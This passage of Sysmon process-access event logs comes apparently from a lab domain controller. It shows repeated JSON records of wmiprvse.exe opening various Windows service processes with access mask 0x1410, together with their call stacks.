(x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5894,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5895,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010BFBC0200}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010BFBC0200}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5896,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001054BF0200}\r\nTargetProcessId: 2384\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001054BF0200}","TargetProcessId":"2384","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5897,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B2C10200}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B2C10200}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5898,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5899,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001050C20200}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001050C20200}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5900,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B6C20200}\r\nTargetProcessId: 2156\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 